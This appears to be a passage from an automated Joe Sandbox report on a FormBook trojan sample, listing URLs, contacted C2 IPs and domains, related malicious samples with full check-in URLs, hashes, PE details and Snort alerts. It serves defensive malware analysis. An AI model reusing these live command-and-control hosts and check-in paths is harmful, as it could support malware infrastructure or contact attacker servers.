                                                    http://www.jiyu-kobo.co.jp/Y0roFu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.jiyu-kobo.co.jp/DFu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.jiyu-kobo.co.jp/jp/Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.comdFu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpfalse
                                                      unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.urwpp.deMT | Fu94e0b1TR.exe, 00000000.00000003.261217392.000000000596E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/ | Fu94e0b1TR.exe, 00000000.00000003.252293628.0000000005999000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/denQ | Fu94e0b1TR.exe, 00000000.00000003.264392875.000000000599E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/y | Fu94e0b1TR.exe, 00000000.00000003.253827230.000000000596D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.comk | Fu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | Fu94e0b1TR.exe, 00000000.00000003.252060604.000000000599A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ms | Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmp, Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/v | Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/t | Fu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.html | Fu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.comt | Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ | Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, Fu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/k | Fu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | Fu94e0b1TR.exe, 00000000.00000003.259630894.0000000005999000.00000004.00000001.sdmp, Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/frere-jones.htmlx | Fu94e0b1TR.exe, 00000000.00000003.259327134.0000000005999000.00000004.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/nly | Fu94e0b1TR.exe, 00000000.00000003.253358837.0000000005963000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers5 | Fu94e0b1TR.exe, 00000000.00000003.259563222.0000000005999000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.comFk | Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://sedo.com/search/details/?partnerid=324561&language=e&domain=shacksolid.com&origin=sales_land | NETSTAT.EXE, 00000012.00000002.518424149.00000000033D2000.00000004.00020000.sdmp | false | | high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
64.190.62.111 | www.shacksolid.com | United States | 11696 | NBS11696US | true
172.65.227.72 | fbc7888164e64afca05b80bb89630439.pacloudflare.com | United States | 13335 | CLOUDFLARENETUS | true

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 502374
Start date: 13.10.2021
Start time: 20:56:10
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 52s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Fu94e0b1TR (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@9/1@6/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 8% (good quality ratio 7%)
• Quality average: 72.9%
• Quality standard deviation: 33%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 78
• Number of non-executed functions: 146
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 95.100.218.79, 95.100.216.89, 204.79.197.200, 13.107.21.200, 20.50.102.62, 8.247.248.223, 8.247.248.249, 8.247.244.221, 40.112.88.60, 2.20.178.24, 2.20.178.33, 20.82.210.154
• Excluded domains from analysis (whitelisted): www.bing.com, fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, dual-a-0001.a-msedge.net, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/502374/sample/Fu94e0b1TR.exe

Simulations

Behavior and APIs

Time | Type | Description
20:57:21 | API Interceptor | 1x Sleep call for process: Fu94e0b1TR.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
64.190.62.111 | divpCHa0h7.exe | malicious | www.mambacustomboats.com/fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS
 | wDzceoRPhB.exe | malicious | www.artoidmode.com/ed9s/?2d64u=GZS0ntMXED7DC&j6A=OS1OG2uUyb/VuVpwb7VagzR+sXqT97Ebu6qajULP6tWiYdo/lZowWla7DoFCis6BwYQ7
 | wO4j83Z0nB.exe | malicious | www.eaglelures.com/shjn/?4huPeB=fLPs2Pf5YsyIrReC5+nyeXhjuGvcKd4ZNbc7bYo7WcEYvq7qfTlOwt6z9eiotXX8oFy5NaIH5g==&8pll=h2M80lLH_NRh4lTP
 | RNIpSzBRVC.exe | malicious | www.shacksolid.com/ef6c/?l6phLTh=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ/Gtb7NPDI39K9qB3Q==&UL=5j0Ll4TXePsH7TFp
 | DHL_DELIVERY_ADDRESS_CONFIRMATION.xlsx | malicious | www.eaglelures.com/shjn/?lL=fLPs2Pf8YryMrBSO7+nyeXhjuGvcKd4ZNbErHb06S8EZvbXsYD0CmpCx+4iXqHv3qlafUg==&NRX4i6=BxoHnNf8mX1
 | Swift Copy.exe | malicious | www.margotandmontague.com/eods/?i8kt=rS6FBqWeadRIrUjRXVGDKJCXOrHmePLNijFl/Z5Z+nBb3zS+3MyVFNG7lwq4S2nmAYRT&1bRLa=YfFxl
 | p83BktbXwe.exe | malicious | www.shacksolid.com/ef6c/?TN6=m6pTon&YFQLD6=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ/GUEKtMNer6K9qGkg==
 | HUuKj0kt3z.exe | malicious | www.shacksolid.com/ef6c/?p4R4=PhjHKdH0&M0=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ8q9HKR0E9es
 | ibelNHDA0l.exe | malicious | www.shacksolid.com/ef6c/?-ZUt=d0G0Yn1hWXrx&6liX3=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ/KtIrBMaY3r
 | SOA.exe | malicious | www.margotandmontague.com/eods/?t2J=i48Hk&0488qv=rS6FBqWeadRIrUjRXVGDKJCXOrHmePLNijFl/Z5Z+nBb3zS+3MyVFNG7lwq4S2nmAYRT
 | JFE6tQehuD.exe | malicious | www.metaju.com/hp6s/?3fi4-=oTVRl9Ml+OPXCj4hXV9OE5wFzXP9r5xGefeVUpAp//OvItILtz2iowizXiJv4RVplgLV&nHe8qD=uT4P8xNpn2xLT
 | qFghuPTDuw.exe | malicious | www.espressence.com/heth/?ZL3DB4=k0ADkxu0U9bB5vfcGnx5Bs1sio5yDITUm4QVk28VSMP15iSTcA+z80qdnmNkqg687zJ8t5HzaA==&j48D=mDHPtfePwBFdPz
 | DUE PAYMENT.exe | malicious | www.arroundworld.com/b2c0/?2dpPwJP=HgvD120OCtIy2y4XcSYLXMqfh1iHIXLo+sJztNYgJy1E5kFWd+L461vXk/S7HsBG78Yt&uN9=3fPH4rk8fd4xHD
 | DUE INVOICES.exe | malicious | www.cleanerstoday.com/b6cu/?BT=2dhhnfvPB6f8zBxp&R2MD6=s6p0OZd7QyF8NlKcRKg3d1Mhcu09NMFJH4/6pKf9s+pgPcRhCY/sfApJlg4NsLKExf7o
 | 04_extracted.exe | malicious | www.floving.com/n64d/?Cp=DP82qm31la64DOOKpdUd06m34NWm8oWBFGOqGRtoZCrcCLyfaO//8P4OrMWD8005mMFK&z8t=Xnpl7Zy8MJQL
 | Order.exe | malicious | www.delights.info/k8b5/?wHzl=n58VdqdNqp0SKyCVZWhsMzftZSLJsGdR5bs0KFZ5CUW42r4DzaRBfIPAFoSHs1TqGO6s&-ZC=m6APvNqxt
 | Statement of Account.exe | malicious | www.cleanerstoday.com/b6cu/?1bxdQ0YH=s6p0OZd7QyF8NlKcRKg3d1Mhcu09NMFJH4/6pKf9s+pgPcRhCY/sfApJljYdjqa8v6Sv&m0DD=bT0pMNUhtf28
 | USD INV#1191189.exe | malicious | www.cleanerstoday.com/b6cu/?R2Mx=s6p0OZd7QyF8NlKcRKg3d1Mhcu09NMFJH4/6pKf9s+pgPcRhCY/sfApJljY38aq8r4av&gJBp9R=4hx40FuPFpNXarZP
 | NEW_PO_QUOTE_88987_PDF.exe | malicious | www.itbling.com/snaa/?Rv=HoB7UN9NeUtFFxU706ZiB/yN8phSIrDDzxMV/Ji+4+dNDKz34ah20hb+VYbC7wDWP/ld&p2J=vZw8NdKxk8f
 | Proforma Invoice.xlsx | malicious | www.nge.xyz/mo8t/?zxlpi=o1c4mJ3VAZ0Opt29tYk9ZJ1L/8ohiIP72w8Hsb8darVa0q91TqSigaAH0fmvs0SBq4qZcQ==&LR=w4UxT2yx30FHEXz

Domains

Match | Associated Sample Name / URL | Detection | Context
fbc7888164e64afca05b80bb89630439.pacloudflare.com | RNIpSzBRVC.exe | malicious | 172.65.227.72
 | 1taaCpMNKr.exe | malicious | 172.65.227.72
 | qZfsUMa6Jh.exe | malicious | 172.65.227.72
 | HUuKj0kt3z.exe | malicious | 172.65.227.72
 | pdrAizaO1R.exe | malicious | 172.65.227.72
 | $$$.exe | malicious | 172.65.227.72
 | sample catalog_2021.exe | malicious | 172.65.227.72
 | Transfer application.exe | malicious | 172.65.227.72
 | CTM ARRANGEMENT.exe | malicious | 172.65.227.72
 | Proforma Invoice & Bank Swift Copy.exe | malicious | 172.65.227.72
 | USU(1).exe | malicious | 172.65.227.72
 | PO#EIMG_501_367_089.exe | malicious | 172.65.227.72
 | RFQ_AP65425652_032421 v#U00e1#U00ba#U00a5n #U00c4#U2018#U00e1#U00bb ,pdf.exe | malicious | 172.65.227.72
 | Request for Quotation RFQ GC-0016862.PDF.exe | malicious | 172.65.227.72
 | hEtfBNCsR8.rtf | malicious | 172.65.227.72
www.shacksolid.com | RNIpSzBRVC.exe | malicious | 64.190.62.111
 | p83BktbXwe.exe | malicious | 64.190.62.111
 | HUuKj0kt3z.exe | malicious | 64.190.62.111
 | ibelNHDA0l.exe | malicious | 64.190.62.111
www.rjtherealest.com | 0n1pEFuGKC.exe | malicious | 74.208.236.145
 | 4ZfdpLEQn1.exe | malicious | 74.208.236.145

ASN

Match | Associated Sample Name / URL | Detection | Context
NBS11696US | divpCHa0h7.exe | malicious | 64.190.62.111
 | wDzceoRPhB.exe | malicious | 64.190.62.111
 | wO4j83Z0nB.exe | malicious | 64.190.62.111
 | RNIpSzBRVC.exe | malicious | 64.190.62.111
 | DHL_DELIVERY_ADDRESS_CONFIRMATION.xlsx | malicious | 64.190.62.111
 | Swift Copy.exe | malicious | 64.190.62.111
 | p83BktbXwe.exe | malicious | 64.190.62.111
 | HUuKj0kt3z.exe | malicious | 64.190.62.111
 | ibelNHDA0l.exe | malicious | 64.190.62.111
 | SOA.exe | malicious | 64.190.62.111
 | JFE6tQehuD.exe | malicious | 64.190.62.111
 | qFghuPTDuw.exe | malicious | 64.190.62.111
 | DUE PAYMENT.exe | malicious | 64.190.62.111
 | x86_64 | malicious | 209.87.95.109
 | DUE INVOICES.exe | malicious | 64.190.62.111
 | 04_extracted.exe | malicious | 64.190.62.111
 | Order.exe | malicious | 64.190.62.111
 | Statement of Account.exe | malicious | 64.190.62.111
 | USD INV#1191189.exe | malicious | 64.190.62.111
 | NEW_PO_QUOTE_88987_PDF.exe | malicious | 64.190.62.111
CLOUDFLARENETUS | qbrMYaTNrE.exe | malicious | 104.21.26.237
 | M12s7KNFDg.exe | malicious | 172.67.168.153
 | farcry6_repack.exe | malicious | 162.159.130.233
 | Original Shipment Doc Ref 2853801324189923,PDF.exe | malicious | 162.159.134.233
 | Gsdqz.dll | malicious | 104.26.6.139
 | 4tOOUNDwaW.exe | malicious | 172.67.168.153
 | 7ofFMoirr5.exe | malicious | 104.21.26.237
 | HUTWMrDhov.dll | malicious | 104.26.7.139
 | 2u2u8wnrrW.exe | malicious | 172.67.216.2
 | z8FnqbFMkV.exe | malicious | 172.67.168.153
 | divpCHa0h7.exe | malicious | 23.227.38.74
 | M1YceQ237E.dll | malicious | 104.20.185.68
 | BF2042.exe | malicious | 162.159.134.233
 | SecuriteInfo.com.W32.AIDetect.malware1.10225.exe | malicious | 104.21.26.237
 | 5y4jNIVnk2.exe | malicious | 104.21.26.237
 | vlF8tRNmtw.exe | malicious | 172.67.173.58
 | FTdhc25gn8.exe | malicious | 162.159.130.233
 | Paymentslip 10132021.xlsx | malicious | 172.67.188.154
 | UZlg2Sq2pQ.exe | malicious | 104.21.17.130
 | Revised_Purchase_Order.htm | malicious | 172.67.219.206

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Fu94e0b1TR.exe.log
Process: C:\Users\user\Desktop\Fu94e0b1TR.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1308
Entropy (8bit): 5.348115897127242
Encrypted: false
SSDEEP: 24:MLUE4KJXE4qpE4Ks2E1qE4qpAE4Kzr7RKDE4KhK3VZ9pKhPKIE4oKFKHKorE4x88:MIHKtH2HKXE1qHmAHKzvRYHKhQnoPtH2
MD5: 832D6A22CE7798D72609B9C21B4AF152
SHA1: B086DE927BFEE6039F5555CE53C397D1E59B4CA4
SHA-256: 9E5EE72EF293C66406AF155572BF3B0CF9DA09CC1F60ED6524AAFD65553CE551
SHA-512: A1A70F76B98C2478830AE737B4F12507D859365F046C5A415E1EBE3D87FFD2B64663A31E1E5142F7C3A7FE9A6A9CB8C143C2E16E94C3DD6041D1CCABEDDD2C21
Malicious: false
Reputation: moderate, very likely benign file
                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.47098319943845
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    File name:Fu94e0b1TR.exe
                                                                    File size:474112
                                                                    MD5:6429aa83e4bc083b4f0b3f44b0d7950f
                                                                    SHA1:0ead59881f054284f611accb61451ed1ffc818fc
                                                                    SHA256:96c57ae661562e958e01bb0b490c09a0a51bb367931620223174963de88bdfcb
                                                                    SHA512:186383701c591db2c011c8ae24920759c10880068dd217e32110ae54b9c7f0863b7fb04e893f601a234742deb5838a22820dc8835ba9198d66b7bb297d502f9b
                                                                    SSDEEP:6144:zMkhBsNolyfnZle9UX08PF85KQ4O1LkyUCZ2e12XZ0bp2Qo7lYB:oSBblyfnZlW+08+5KQpyy52nZ0vo7a
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....fa..............0.................. ........@.. ....................................@................................

                                                                    File Icon

                                                                    Icon Hash:c4b28ed696aa92c0

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x45c99e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                    Time Stamp:0x6166A519 [Wed Oct 13 09:21:29 2021 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:v4.0.30319
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5c94c | 0x4f | .text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5e000 | 0x18c94 | .rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x78000 | 0xc | .reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                    Sections

                                                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                    .text | 0x2000 | 0x5a9a4 | 0x5aa00 | False | 0.880191271552 | data | 7.77320879492 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .rsrc | 0x5e000 | 0x18c94 | 0x18e00 | False | 0.1953125 | data | 5.07036789646 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc | 0x78000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    Name | RVA | Size | Type | Language | Country
                                                                    RT_ICON | 0x5e180 | 0x468 | GLS_BINARY_LSB_FIRST | |
                                                                    RT_ICON | 0x5e5f8 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | |
                                                                    RT_ICON | 0x5f6b0 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | |
                                                                    RT_ICON | 0x61c68 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | |
                                                                    RT_ICON | 0x65ea0 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | |
                                                                    RT_GROUP_ICON | 0x766d8 | 0x4c | data | |
                                                                    RT_VERSION | 0x76734 | 0x360 | data | |
                                                                    RT_MANIFEST | 0x76aa4 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                                                    Imports

                                                                    DLL | Import
                                                                    mscoree.dll | _CorExeMain

                                                                    Version Infos

                                                                    Description | Data
                                                                    Translation | 0x0000 0x04b0
                                                                    LegalCopyright | Copyright Gottschalks 2011
                                                                    Assembly Version | 1.0.0.0
                                                                    InternalName | ObjectMarshal.exe
                                                                    FileVersion | 1.0.0.0
                                                                    CompanyName | Gottschalks
                                                                    LegalTrademarks |
                                                                    Comments |
                                                                    ProductName | MapEditor1
                                                                    ProductVersion | 1.0.0.0
                                                                    FileDescription | MapEditor1
                                                                    OriginalFilename | ObjectMarshal.exe

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                    10/13/21-20:59:09.555144 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49795 | 80 | 192.168.2.5 | 64.190.62.111
                                                                    10/13/21-20:59:09.555144 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49795 | 80 | 192.168.2.5 | 64.190.62.111
                                                                    10/13/21-20:59:09.555144 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49795 | 80 | 192.168.2.5 | 64.190.62.111
                                                                    10/13/21-20:59:19.990837 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49797 | 80 | 192.168.2.5 | 192.0.78.24
                                                                    10/13/21-20:59:19.990837 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49797 | 80 | 192.168.2.5 | 192.0.78.24
                                                                    10/13/21-20:59:19.990837 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49797 | 80 | 192.168.2.5 | 192.0.78.24

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Oct 13, 2021 20:58:54.041382074 CEST | 49790 | 80 | 192.168.2.5 | 172.65.227.72
                                                                    Oct 13, 2021 20:58:54.057359934 CEST | 80 | 49790 | 172.65.227.72 | 192.168.2.5
